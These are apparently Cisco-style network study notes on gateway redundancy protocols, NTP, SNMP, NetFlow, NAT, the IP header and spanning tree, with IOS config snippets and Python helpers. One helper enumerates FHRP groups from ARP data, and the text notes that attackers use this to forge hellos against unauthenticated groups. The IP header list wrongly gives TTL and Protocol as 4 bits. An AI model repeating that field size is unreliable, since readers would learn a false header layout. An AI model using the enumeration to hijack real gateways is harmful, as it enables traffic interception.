When the router forwards the DHCP request to the server it also replaces the 0.0.0.0 source address with its own address on the subnet the broadcast arrived on (the same address it puts in giaddr), which is how the server selects the right pool.

HSRP, VRRP, and GLBP

IP hosts can obtain a default gateway using DHCP, BOOTP, ICMP Router Discovery Protocol (IRDP), manual configuration or by running a routing protocol.

Hot Standby Router Protocol (HSRP):

- Virtual IP and virtual MAC active on the active router.
- Virtual IP must be different from any other IP address.
- Version 1 virtual MAC of 0000.0c07.acXX (XX is the hex HSRP group); version 2 uses 0000.0c9f.fXXX (XXX is the 12-bit group).
- Version 1 supports groups 0-255 per interface; version 2 supports groups 0-4095.
- Version 1 uses 224.0.0.2 and version 2 uses 224.0.0.102 (UDP destination port 1985).
- Standby routers listen for Hellos from the active router.
- The hello interval is 3 seconds and the dead interval is 10 seconds.
- Highest priority (by default 100) determines the active router.
- Preemption is disabled by default.
- Supports tracking.
- Supports clear-text and MD5 authentication.

When preemption is disabled:

- Even if the priority of the active router drops below the standby router's, the active router keeps the active role.
- Only when the active router's interface fails does the standby router take the active role.

Router(config)# track 15 interface serial0/0 line-protocol
Router(config)# interface fastethernet0/0
Router(config-if)# standby 21 ip 10.1.1.21
Router(config-if)# standby 21 priority 105
Router(config-if)# standby 21 preempt
Router(config-if)# standby 21 track 15 decrement 6
Router(config-if)# standby 22 ip 10.1.1.22
Router(config-if)# standby 22 preempt
Router(config-if)# standby 22 track 15 decrement 12
Router# show standby fa0/0

Virtual Router Redundancy Protocol (VRRP):

- Virtual IP and virtual MAC active on the master router.
- Virtual IP may be the same as an address configured on a physical interface (that router, the address owner, uses priority 255).
- Virtual MAC of 0000.5e00.01XX (XX is the hex VRRP group).
- Up to 255 VRRP groups per interface.
- Uses 224.0.0.18 and IP protocol number 112.
- Backup routers listen for Hellos from the master router.
- The hello interval is 1 second and the dead interval is 3 seconds.
- Highest priority (by default 100) determines the master router.
- Preemption is enabled by default.
- Supports tracking.
- Supports clear-text and MD5 authentication.

Gateway Load Balancing Protocol (GLBP):

- Up to 4 active virtual forwarders (AVF).
- Virtual IP must be different from any other IP address.
- Virtual IP on the active virtual gateway (AVG) and load shares ARP requests between AVF.
- Individual virtual MAC on each AVF.
- Virtual MAC of 0007.b400.XXYY (XX is the hex GLBP group and YY the AVF number {01|02|03|04}).
- Up to 255 GLBP groups per interface.
- Uses 224.0.0.102 (UDP source/destination port 3222).
- Standby routers listen for Hellos from the active router.
- The hello interval is 3 seconds and the dead interval is 10 seconds.
- Preemption is disabled by default.
- Supports tracking.
- Supports clear-text and MD5 authentication.
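A gateway's MAC gives away which FHRP and which group protect it, which is what an attacker needs to forge a higher-priority hello against an unauthenticated group and what an auditor wants to enumerate. The Python below is an added example, not from the page: it recognises the virtual MAC formats listed above, plus HSRP version 2 (0000.0c9f.fXXX, 12-bit group) which the notes do not list, and runs over a constructed ARP table; the addresses, the table and the function names identify_fhrp_mac and virtual_gateways are made up for the example.

```python
# Constructed 'ip mac' entries, as one would pull from show ip arp on a host
# or router in the VLAN; none of these addresses refer to a real network.
ARP_TABLE = """\
10.1.1.21   0000.0c07.ac15
10.1.1.22   0000.0c07.ac16
10.1.1.1    0000.5e00.0101
10.1.1.5    0007.b400.0a01
10.1.1.6    0007.b400.0a02
10.1.1.100  0050.56ab.cdef
10.1.1.200  0000.0c9f.f07b
"""


def identify_fhrp_mac(mac: str):
    """Classify a MAC address as an FHRP virtual MAC.

    Returns (protocol, group, forwarder) or None for an ordinary MAC.
      HSRP v1  0000.0c07.acXX  XX  = group 0-255
      HSRP v2  0000.0c9f.fXXX  XXX = group 0-4095
      VRRP     0000.5e00.01XX  XX  = VRID 1-255
      GLBP     0007.b400.XXYY  XX  = group, YY = forwarder 1-4
    Accepts Cisco dotted (0000.0c07.ac15), colon and hyphen notations."""
    digits = "".join(ch for ch in mac.lower() if ch in "0123456789abcdef")
    if len(digits) != 12:
        raise ValueError(f"not a MAC address: {mac!r}")
    if digits.startswith("00000c07ac"):
        return ("HSRPv1", int(digits[10:], 16), None)
    if digits.startswith("00000c9ff"):
        return ("HSRPv2", int(digits[9:], 16), None)
    if digits.startswith("00005e0001"):
        return ("VRRP", int(digits[10:], 16), None)
    if digits.startswith("0007b400"):
        return ("GLBP", int(digits[8:10], 16), int(digits[10:], 16))
    return None


def virtual_gateways(arp_table: str) -> dict:
    """Parse 'ip mac' lines (one entry per line, as in the constructed sample)
    and return the FHRP virtual gateways found, keyed by IP address."""
    found = {}
    for line in arp_table.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        info = identify_fhrp_mac(parts[1])
        if info is not None:
            found[parts[0]] = info
    return found


if __name__ == "__main__":
    for ip, (proto, group, fwd) in virtual_gateways(ARP_TABLE).items():
        extra = f" forwarder {fwd}" if fwd is not None else ""
        print(f"{ip}: {proto} group {group}{extra}")
```

The two HSRP entries map back to the standby 21 and standby 22 groups in the configuration above (0x15 = 21, 0x16 = 22). If a scan like this finds groups on a segment that untrusted hosts can reach, the MD5 authentication listed for each protocol is the control to check first.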

NTP

Atomic clocks and GPS satellite transmissions provide a source of stratum 1.

Router(config)# ntp authentication-key 1 md5 MYKEY
Router(config)# ntp authenticate
Router(config)# ntp trusted-key 1
Router(config)# ntp master 7
Router(config)# ntp server 10.1.1.1
Router(config)# ntp peer 10.2.2.2 
Router(config)# int fa0/0
Router(config-if)# ntp broadcast
Router(config)# int fa0/1
Router(config-if)# ntp broadcast client
Router# show ntp status
Router# show ntp associations

SNMP

Uses UDP port 161 (traps use UDP port 162).

- SNMPv1: SMIv1, communities, MIB-I
- SNMPv2: SMIv2, communities removed, GetBulk and Inform messages, MIB-II
- SNMPv2c: Equivalent to SNMPv2, communities
- SNMPv3: Same operations as SNMPv2; communities are replaced by the User-based Security Model (per-user authentication and encryption)

SNMP Protocol Messages

Message   Version  Reply     Sent by  Purpose
Get       1        Response  Manager  Request single MIB variable
GetNext   1        Response  Manager  Request next single MIB variable
GetBulk   2        Response  Manager  Request consecutive MIB variables
Response  1        None      Agent    Reply with the information requested
Set       1        Response  Manager  Set a particular variable
Trap      1        None      Agent    Send unsolicited information
Inform    2        Response  Manager  Message between Managers (MIB exchange)

Syslog

Syslog uses UDP port 514.
logging buffered is disabled by default.
logging host 10.1.1.1 sets the syslog server.
logging trap level sets the maximum severity sent to the syslog server (logging trap debugging sends everything; a lower level such as warnings limits what is sent).

Web Cache Communication Protocol

Cisco protocol to allow transparent HTTP proxy.
Uses UDP port 2048.
WCCPv1 supports up to 32 content engines, the one with the lowest IP address is elected as the lead engine.
WCCPv2 (default version) supports:

- Supports TCP and UDP traffic other than HTTP traffic.
- Segmenting caching services provided by a caching cluster per protocol.
- Multicast, MD5 authentication, load distribution and transparent error handling.

Router(config)# ip wccp web-cache group-address 239.128.1.100 password MYPASS
Router(config)# interface fa0/0
Router(config-if)# ip wccp web-cache redirect in ! Enables redirection
Router(config)# interface fa0/1
Router(config-if)# ip wccp web-cache exclude in ! Disables redirection
Router(config)# access-list 1 permit 192.168.1.0 0.0.0.255
Router(config)# ip wccp web-cache group-list 1 ! List of content engines
Router(config)# access-list 2 permit 192.168.2.0 0.0.0.255
Router(config)# ip wccp web-cache redirect-list 2 ! List of redirected hosts

Implementing the Cisco IOS IP Service Level Agreement (IP SLA) Feature

Allows measuring:

- Delay (one way and round trip)
- Jitter
- Packet loss
- Packet sequencing
- Path (per hop)
- Connectivity (UDP echo, ICMP echo, TCP connect)
- Server download time
- Voice-quality metrics

IP SLA control protocol between the monitor and the responder uses UDP port 1967.

Responder(config)# ip sla responder
Monitor(config)# ip sla 1
Monitor(config-ip-sla)# udp-echo 192.168.12.1 1330
Monitor(config)# ip sla schedule 1 life forever start-time now
Monitor# show ip sla statistics 1

Implementing NetFlow

c6500(config)# interface fa0/0.10
c6500(config-if)# ip flow ingress ! Software-routed (MSFC)
c6500(config)# interface fa0/1
c6500(config-if)# ip route-cache flow ! Software-routed (MSFC)
c6500(config)# ip flow-export source lo0
c6500(config)# ip flow-export destination 10.1.1.1 9996
c6500(config)# ip flow-export version 5
c6500(config)# mls netflow ! Hardware-routed (PFC)
c6500(config)# mls flow ip interface-full
c6500(config)# mls nde sender version 5 ! Netflow Data Export

Implementing Router IP Traffic Export

RITE is the router counterpart of SPAN on switches (only IP traffic is replicated).

Router(config)# ip traffic-export profile EXPORT
Router(conf-rite)# interface FastEthernet0/0
Router(conf-rite)# bidirectional
Router(conf-rite)# incoming sample one-in-every 5
Router(conf-rite)# outgoing sample one-in-every 5
Router(conf-rite)# mac-address aaa0.bbbb.cccc
Router(config)# interface Serial0/0
Router(config-if)# ip traffic-export apply EXPORT

Implementing Cisco IOS Embedded Event Manager

Tracks and classifies events on a router and provides notifications.
EEM overlaps with RMON functionality, but is considered more powerful and flexible.

Router(config)# event manager applet CLI-copy_run_start
Router(config-applet)# event cli pattern "wr" sync yes
Router(config-applet)# action 1 syslog msg "$_cli_msg Command Executed"
Router(config-applet)# set 2 _exit_status 1
Router(config-applet)# end

Implementing Remote Monitoring

RMON lets you configure thresholds for alerting based on SNMP objects.
RMON is divided into two classes: alarms and events.
You set the rising and falling thresholds in an alarm and tell RMON which event to trigger when each threshold is crossed.

Router(config)# rmon event 1 log trap public description Fa0.0RisingErrors owner config
Router(config)# rmon event 2 log trap public description Fa0.0FallingErrors owner config
Router(config)# rmon event 3 log trap public description Se0.0RisingErrors owner config
Router(config)# rmon event 4 log trap public description Se0.0FallingErrors owner config
Router(config)# rmon alarm 20 ifInErrors.1 60 delta rising-threshold 10 1 falling-threshold 5 2 owner config
Router(config)# rmon alarm 30 ifInErrors.2 60 absolute rising-threshold 20 3 falling-threshold 10 4 owner config
Router# show rmon alarm
Router# show rmon event

Implementing and Using FTP on a Router

Router(config)# ip ftp username Joe
Router(config)# ip ftp password cisco
Router(config)# ip ftp passive
Router(config)# exception protocol ftp
Router(config)# exception region-size 65536
Router(config)# exception dump 172.30.1.1

Implementing a TFTP Server on a Router

Router(config)# tftp-server flash:c1700-advipservicesk9-mz.124-23.bin alias c1700.bin 10

Implementing Secure Copy Protocol

Router(config)# hostname Secure
Secure(config)# ip domain-name lab.net
Secure(config)# crypto key generate rsa general-keys modulus 1024
Secure(config)# aaa authentication login default local
Secure(config)# aaa authorization exec default local
Secure(config)# username admin privilege 15 secret 0 MYSECRET
Secure(config)# ip scp server enable

Implementing HTTP and HTTPS Access

Router(config)# ip http server
Router(config)# ip http port 8080
Router(config)# ip http access-class 100
Router(config)# ip http client username Joe
Router(config)# ip http client password cisco
Router(config)# ip http authentication [aaa | local | enable | tacacs]
Router(config)# ip http secure-server
Router# show ip http server secure status

Implementing Telnet Access

Router(config)# access-list 100 deny tcp any any eq 23
Router(config)# access-list 100 permit tcp any any eq 3010
Router(config)# access-list 100 deny ip any any
Router(config)# line vty 0 4
Router(config-line)# rotary 10 queued ! Telnet port == 3000 + rotary group
Router(config-line)# access-class 100 in

Implementing SSH Access

Secure(config)# access-list 100 deny tcp any any eq 22
Secure(config)# access-list 100 permit tcp any any eq 2010
Secure(config)# access-list 100 deny ip any any
Secure(config)# line vty 0 4
Secure(config-line)# rotary 10 queued ! SSH port == 2000 + rotary group
Secure(config-line)# access-class 100 in
Secure(config-line)# transport input ssh

# IP Addressing

IP Addressing and Subnetting Review

Class A: 1-126/8
Class B: 128-191/16
Class C: 192-223/24
Class D: 224-239
Class E: 240-255

Static NAT

Does not help with IP address conservation, but makes an inside server available to clients on the Internet.

Router(config)# interface ethernet0/0
Router(config-if)# ip nat inside
Router(config)# interface serial0/0
Router(config-if)# ip nat outside
Router(config)# ip nat inside source static 10.1.1.1 200.1.1.1

Dynamic NAT Without PAT

Like static NAT but uses a pool of addresses to assign dynamically.

Dynamic NAT and PAT Configuration

Router(config)# interface ethernet0/0
Router(config-if)# ip nat inside
Router(config)# interface serial0/0
Router(config-if)# ip nat outside
Router(config)# access-list 1 permit 10.1.1.0 0.0.0.255
Router(config)# ip nat pool NATPOOL 200.1.1.1 200.1.1.2 netmask 255.255.255.252
Router(config)# ip nat inside source list 1 pool NATPOOL

Command Reference

Router(config)# ip nat inside destination list {access-list-number | name} pool name
Router# show ip nat statistics
Router# show ip nat translations
Router# clear ip nat translation ?

IP Header

- Version (4b)
- Header Length (4b): Defines the length of the IP header, including optional fields.
- DS Field (8b): Differentiated Services Field, originally called Type of Service (ToS).
- Packet Length (16b): Defines the length of the IP packet, including the data.
- Identification (16b): All fragments of the original packet contain the same identifier.
- Flags (3b): Fragmentation flags.
- Fragment Offset (13b): Identifies the fragment location in the original packet.
- Time to Live (4b)
- Protocol (4b): Identifies the contents of the data field.
- Header Checksum (16b): Frame Check Sequence of the IP header (not the data).
- Source IP Address (32b)
- Destination IP Address (32b)
- Optional Header Fields and Padding (multiple of 4Bytes): For future expansion via optional headers.

IP Protocol Field Values

- ICMP: 1
- TCP: 6
- UDP: 17
- EIGRP: 88
- OSPF: 89
- PIM: 103
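As an added example (not part of these notes), a parser for the header fields listed above, using the RFC 791 octet layout, that also verifies the header checksum and maps the Protocol field with the values just listed; the sample packet is constructed:

```python
# Added example, not from the notes: parses the header fields listed above from raw bytes
# and verifies the header checksum (RFC 791 octet layout; TTL and Protocol are one octet each).
import struct

PROTOCOLS = {1: "ICMP", 6: "TCP", 17: "UDP", 88: "EIGRP", 89: "OSPF", 103: "PIM"}  # from notes

def ones_complement_sum(data):
    """16-bit one's-complement sum over data (odd length is zero-padded), folded to 16 bits."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total

def parse_ipv4_header(packet):
    """Return the header fields as a dict; raise ValueError on a malformed header."""
    if len(packet) < 20:
        raise ValueError("truncated: fewer than 20 bytes")
    ver_ihl, tos, total_len, ident, flags_frag, ttl, proto, csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", packet[:20])
    version, hdr_len = ver_ihl >> 4, (ver_ihl & 0x0F) * 4   # IHL counts 32-bit words
    if version != 4:
        raise ValueError("not IPv4")
    if hdr_len < 20 or hdr_len > len(packet) or total_len < hdr_len:
        raise ValueError("inconsistent header/packet length")
    if ones_complement_sum(packet[:hdr_len]) != 0xFFFF:   # a valid header sums to all ones
        raise ValueError("bad header checksum")
    return {
        "version": version, "header_length": hdr_len, "dscp": tos >> 2, "ecn": tos & 3,
        "packet_length": total_len, "identification": ident,
        "dont_fragment": bool(flags_frag & 0x4000), "more_fragments": bool(flags_frag & 0x2000),
        "fragment_offset": (flags_frag & 0x1FFF) * 8,   # carried in 8-byte units
        "ttl": ttl, "protocol": PROTOCOLS.get(proto, proto), "checksum": csum,
        "src": ".".join(map(str, src)), "dst": ".".join(map(str, dst)),
        "options": packet[20:hdr_len],
    }

def build_ipv4_header(src, dst, proto, payload_len, ttl=64, ident=0x1234, flags=0x4000):
    """Build a 20-byte header with a correct checksum (used to construct the sample)."""
    addrs = [bytes(int(o) for o in a.split(".")) for a in (src, dst)]
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident, flags, ttl, proto, 0, *addrs)
    csum = 0xFFFF ^ ones_complement_sum(hdr)   # one's complement of the sum with the field zeroed
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:]

# Constructed sample: UDP from 10.1.1.1 to 10.1.1.2 with an 8-byte zero payload (DF set).
SAMPLE = build_ipv4_header("10.1.1.1", "10.1.1.2", 17, 8) + b"\x00" * 8

if __name__ == "__main__":
    print(parse_ipv4_header(SAMPLE))
```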

# 802.1d Spanning Tree Protocol

Choosing Which Ports Forward

1. Elect the root switch: lowest bridge ID wins.
2. Determine each switch's Root Port: the one port on each switch with the least cost path back to the root.
3. Determine the Designated Port for each segment: the port of the switch that forwards the least cost Hello onto a segment.

Electing a Root Switch

Each switch begins by sending STP Hello BPDUs claiming to be the root.
When a switch hears a superior Hello, it stops claiming to be root and starts forwarding the superior Hellos.

The original 802.1d bridge ID has two fields:

- Priority (2B)
- System ID == MAC Address (6B)

The 802.1d bridge ID has since been redefined:

- Priority, multiple of 4096 (4b)
- System ID Extension == VLAN ID (12b)
- System ID == MAC Address (6B)

Determining the Root Port

The root sends a Hello every Hello timer (2 seconds by default).
Each switch that receives a Hello forwards it after updating:

- Cost (received cost + port cost of the port on which the hello was received)
- Bridge ID (forwarder's BID)
- Port priority (forwarder's port priority)
- Port number (forwarder's port number)

Port costs:
Speed      Original IEEE Cost   Revised IEEE Cost
10 Mbps    100                  100
100 Mbps   10                   19
1 Gbps     1                    4
10 Gbps    1                    2

Tiebreakers to elect the Root Port:

- Use the port with the least cost to the root.
- If the cost is equal, use the port with the lowest BID.
- If the BID is the same, use the port with the lowest priority.
- If the priority is equal, use the port with the lowest port number.

Switch(config)# no spanning-tree vlan 10
Switch(config-if)# spanning-tree vlan 11 cost 10
Switch(config-if)# spanning-tree vlan 12 port-priority 120

Determining the Designated Port

The switch that forwards Hellos onto a LAN segment is called the designated switch and the port onto that segment is called the Designated Port (DP).
The DP sends the lowest advertised cost.
The tiebreakers are the same.
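As an added example (not part of these notes), the root election, Root Port selection and Designated Port selection above carried out in code on a constructed three-switch topology; with equal priorities SW1 wins the election on lowest MAC, and the parallel SW2-SW3 links exercise the port-number tiebreaker:

```python
# Added example, not from the notes: 802.1d root election and port roles using the tiebreakers above.
PORT_COST = {10: 100, 100: 19, 1000: 4, 10000: 2}   # revised IEEE costs, keyed by Mbps

def elect_root(switches):
    """switches maps name -> (priority, MAC); the lowest tuple (bridge ID) wins."""
    return min(switches, key=lambda s: switches[s])

def link_ends(link, sw):
    """Returns (neighbour, neighbour_port, my_port, speed) for link as seen from sw."""
    a, pa, b, pb, speed = link
    return (b, pb, pa, speed) if sw == a else (a, pa, pb, speed)

def root_ports(switches, links):
    """Relay Hellos from the root until stable; each switch keeps the best Hello by
    (cost, sender BID, sender port priority, sender port number) as in the notes.
    Returns (root, {switch: cost to root}, {switch: root port number})."""
    root = elect_root(switches)
    cost = {s: float("inf") for s in switches}
    cost[root], rp, changed = 0, {}, True
    while changed:
        changed = False
        for sw in (s for s in switches if s != root):
            hellos = []
            for link in (l for l in links if sw in (l[0], l[2])):
                nbr, nbr_port, my_port, speed = link_ends(link, sw)
                if cost[nbr] != float("inf"):   # received cost + cost of the ingress port
                    hellos.append((cost[nbr] + PORT_COST[speed], switches[nbr],
                                   nbr_port[0], nbr_port[1], my_port[1]))
            if hellos:
                best = min(hellos)
                if (best[0], best[4]) != (cost[sw], rp.get(sw)):
                    cost[sw], rp[sw], changed = best[0], best[4], True
    return root, cost, rp

def port_roles(switches, links):
    """Per (switch, port number): 'root', 'designated' or 'blocking'. The Designated Port
    on a segment is the end with the lowest (cost, BID, port priority, port number)."""
    root, cost, rp = root_ports(switches, links)
    roles = {(sw, p): "root" for sw, p in rp.items()}
    for a, pa, b, pb, _ in links:
        dp = min((a, pa), (b, pb), key=lambda e: (cost[e[0]], switches[e[0]], e[1]))
        for sw, port in ((a, pa), (b, pb)):
            if (sw, port) == dp:
                roles[(sw, port[1])] = "designated"
            else:                                 # neither DP nor RP: Blocking
                roles.setdefault((sw, port[1]), "blocking")
    return roles

# Constructed topology: a link is (sw_a, port_a, sw_b, port_b, speed_mbps); a port is (priority, number).
SWITCHES = {"SW1": (32768, "0000.0000.0001"), "SW2": (32768, "0000.0000.0002"),
            "SW3": (32768, "0000.0000.0003")}
LINKS = [("SW1", (128, 1), "SW2", (128, 1), 100),
         ("SW1", (128, 2), "SW3", (128, 1), 10),    # 10 Mbps link: cost 100, loses
         ("SW2", (128, 2), "SW3", (128, 2), 100),   # parallel pair to SW3: the lower
         ("SW2", (128, 3), "SW3", (128, 3), 100)]   # sender port number wins the tie
```

Running `port_roles(SWITCHES, LINKS)` leaves SW3 with port 2 as Root Port and ports 1 and 3 Blocking, while every SW1 port and SW2 ports 2 and 3 are Designated.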

Converging to a New STP Topology

If a switch does not receive Hellos on its Root Port within the Max Age timer (20 seconds by default), it begins a new root election by claiming to be the root and flooding Hellos out every port.
If it does not receive Hellos on a Blocking port within the Max Age timer, it moves that port to the Listening state.

Topology Change Notification and Updating the CAM

- A switch experiencing a port state change sends a TCN (Topology Change Notification) BPDU out its Root Port. It repeats this message every Hello time until it is acknowledged.
- A designated switch receiving that TCN BPDU sends back a normal Hello BPDU with the TCA (Topology Change Acknowledgment) bit set.
- The process repeats until the root receives the TCN BPDU. Once received, the root sets the TC (Topology Change) bit on its next Hellos. A switch receiving a Hello BPDU with the TC bit set times out its CAM entries.

Transitioning from Blocking to Forwarding

The switch waits the Forward Delay timer (15 seconds by default) in each of the Listening and Learning states before moving to Forwarding.
802.1d port states:
State      Forwards data frames?   Learns source MACs?   Stable?
Blocking   No                      No                    Stable
Listening  No                      No                    Transitory
Learning   No                      Yes                   Transitory
Forwarding Yes                     Yes                   Stable
Disabled   No                      No                    Stable

Per-VLAN Spanning Tree and STP over Trunks

802.1Q does not support PVST+ natively; Cisco switches do.
Non-Cisco 802.1Q switches run only one STP instance (the Common Spanning Tree, CST) over VLAN 1 for all VLANs.
Two PVST+ regions separated by a single CST region share PVST+ information by sending VLAN-tagged BPDUs to the multicast destination MAC 01:00:0c:cc:cc:cd.
Non-Cisco switches do not interpret these BPDUs, but Cisco switches do.
Non-Cisco 802.1Q switches support multiple STP instances with 802.1s (MST).

Switch(config)# spanning-tree mode pvst

STP Configuration and Analysis

Default STP priority is 32768.
Switch(config)# spanning-tree vlan 1 root {primary | secondary } [diameter]
primary sets the priority to 24576 if the current root has a priority larger than 24576; otherwise it sets the priority to 4096 less than the current root's priority.
secondary sets the priority to 28672.
diameter calculates new STP timers based on the max number of switches/hops (by default 7 switches) between two end stations.

Optimizing Spanning Tree

Convergence might take between 30 and 50 seconds.

PortFast, UplinkFast, and BackboneFast

These Cisco-proprietary features solve specific STP problems.

- PortFast: Used on access ports. Immediately puts the port into forwarding state.
- UplinkFast: Used on access switches. Immediately replaces a lost Root Port with an alternate Root Port.
- BackboneFast: Used to detect indirect link failures. Avoids waiting for Maxage when a Root Port ceases to receive Hellos.

PortFast

To be safe, also enable the BPDU Guard and Root Guard features.

UplinkFast

The command takes three actions:

- Increases the root priority to 49152.
- Sets the port cost to 3000.
- Tracks alternate Root Ports.

When the Root Port fails, the switch fails over to an alternate Root Port and forwards immediately.
Also, the switch sends dummy frames (with the station MAC entries as source and 01:00:0c:cd:cd:cd as the multicast destination) to update the other switches' CAM tables without using the TCN process.

BackboneFast

When the first Hello goes missing, a BackboneFast switch sends a Root Link Query (RLQ) BPDU asking the neighboring switch whether it has lost its path to the root. Once the failure is confirmed, the switch converges without waiting for the Max Age timer. All switches must have BackboneFast configured.

PortFast, UplinkFast, and BackboneFast Configuration

Switch(config-if)# spanning-tree portfast
Switch(config)# spanning-tree portfast default
Switch(config)# spanning-tree uplinkfast [max-update-rate rate]
Switch(config)# spanning-tree backbonefast

Load Balancing Across PortChannels

Load balancing is based on the contents of layer 2, 3 and/or 4 headers.
The goal is to use a balancing method for which the fields in the frames actually vary.

Switch(config)# port-channel load-balance {src-mac | dst-mac | src-dst-mac | src-ip | dst-ip | src-dst-ip | src-port | dst-port | src-dst-port | mpls}

PortChannel Discovery and Configuration

The dynamic protocols are Port Aggregation Protocol (PAgP, Cisco-proprietary) and Link Aggregation Control Protocol (LACP, IEEE 802.3ad).

Switch(config-if)# channel-protocol {lacp | pagp}

PAgP      LACP     Action
on        on       Disables PAgP and LACP. Forces the port into the PortChannel.
off       off      Disables PAgP and LACP. Prevents the port from being part of a PortChannel.
auto      passive  Uses PAgP or LACP. Waits on the other side messages.
desirable active   Uses PAgP or LACP. Initiates the negotiation.

Several items must be identical on the links to be added to the PortChannel:

- Same speed and duplex
- If not trunking, same access VLAN
- If trunking, same trunk type, allowed VLANs and native VLAN
- The same STP cost per VLAN
- No SPAN configured

Rapid Spanning Tree Protocol

IEEE 802.1w improves STP convergence and is backward compatible with 802.1d.
The key components are:

- Waiting for only 3 missed Hellos on a RP before reacting (versus 10 missed with 802.1d).
- Bypassing the 802.1d Listening state (Discarding -> Learning).
- Inclusion of the Cisco features PortFast, UplinkFast and BackboneFast (RLQ).
- Backup Designated Port feature

Link types:

- Point-to-point: connects a switch to one other switch: spanning-tree link-type point-to-point
- Shared: connects a switch to a hub.
- Edge: spanning-tree portfast

Port states:

- Discarding
- Learning
- Forwarding

Port roles:

- Root Port
- Designated Port
- Alternate Port: Backup Root Port (UplinkFast)
- Backup Port: Backup Designated Port

RPVST+ and MST use 802.1w.

Switch(config)# spanning-tree mode rapid-pvst

Rapid Per-VLAN Spanning Tree Plus (RPVST+)

RPVST+ is compatible with MSTP and PVST+.

Multiple Spanning Trees: 802.1s

Two switches belong to the same MST region if they use the same region name, the same revision number and the same configured instances.
When connecting an MST region to a non-MST region or to a different MST region, MST makes the MST region appear to be a single switch. This STP instance is called the Internal Spanning Tree (IST).

Switch(config)# spanning-tree mode mst

Root Guard and BPDU Guard: Protecting Access Ports

- BPDU Guard: does not recover from err-disabled state.
- Root Guard: recovers from loop-inconsistent state when the superior BPDUs are no longer received.

UDLD and Loop Guard: Protecting Trunks

- UDLD normal mode: puts the port into unknown state.
- UDLD aggressive mode: puts the port into error-disabled state and ceases sending traffic.
- Loop Guard: when normal BPDUs are no longer received, the port does not go through normal STP convergence, but rather falls into loop-inconsistent state.

Troubleshooting Using Basic Interface Statistics

Switch# show interface
Switch# show controllers

Troubleshooting Spanning Tree Protocol

Switch# show spanning-tree root
Switch# show interfaces status err-disabled
Switch# show spanning-tree inconsistentports

Troubleshooting Trunking

Switch# show interfaces switchport
Switch# show spanning-tree inconsistentports
Switch# show interfaces trunk

Troubleshooting VTP

Switch# show vtp status

Troubleshooting EtherChannels

Switch# show etherchannel summary
Switch# show interface etherchannel
Switch# show interface port-channel 1